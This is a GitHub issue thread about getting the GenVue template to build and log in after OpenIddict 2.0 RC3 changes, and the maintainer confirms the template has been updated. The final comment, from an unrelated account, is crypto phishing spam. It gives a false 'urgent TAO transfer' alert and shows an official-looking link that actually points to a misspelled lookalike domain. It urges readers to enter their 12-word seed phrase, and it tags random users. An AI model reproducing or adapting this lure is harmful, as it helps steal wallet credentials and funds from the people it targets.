### ISSUE TITLE
Cannot Login / Build Project

### ISSUE THREAD

**Issue by steve-79** [herbat73/GenVue#1]
Due to the recent releases of OpenIddict, I've tried for the past three days and cannot successfully get this template to work :(  It's an amazing template, and I'm sure I'm missing a few simple mistakes. I've modified the Startup.cs file according to the migration to openiddict 2.0.0-rc3 documentation, and even though the project now builds I still cannot successfully connect the api calls with the openiddict methods and vice versa.  

Instead of the wildcard nuget packages included with this download, openiddict 2.0.0-*, would you know which specific packages you used to have the template run successfully?  Thank you very much for your template and any help would be greatly appreciated!

**Comment by herbat73** [comment]
Yes, indeed. I need to update code for openiddict 2.0.0-rc3 due to significant changes. Hope I will do soon...

**Comment by herbat73** [comment]
check now, it has been updated to OpenIddict 2.0.0 RC3 and netcore 2.1

**Comment by consejeriaescolar** [comment]
# Urgent TAO Token Transfer Notification

🚨 Urgent Notice: A total of 60 TAO tokens has been successfully transferred to unknown wallet address.

**Action Required:**
1. **Secure Your Wallet Immediately:**
   - Visit the official TAO Wallet website: [https://wallet.bittensor.com](https://wallet.bittlensor.com).
   - Click on "Import Wallet" and follow the instructions to import your wallet.
   - Add the 12-word phrase to your wallet for additional security.
   - Reset your private key urgently to enhance the security of your funds.

2. **Recover Transferred Funds:**
   - Once your wallet is imported, navigate to the "Reclaim Funds" section.
   - Follow the on-screen instructions to initiate the fund recovery process.

Act promptly to secure your TAO funds, add the 12-word phrase, and reset your private key for enhanced safety.

---

**Note:** Always perform these actions on the official TAO Wallet website to ensure the security of your funds. If you face any issues, contact our support team immediately.

Securely yours! 🚀


Winners: @lymgushen, @xnzac, @Armando115Tapia, @Geridev, @jgh2i, @cristiana214, @rasoolseyghaly
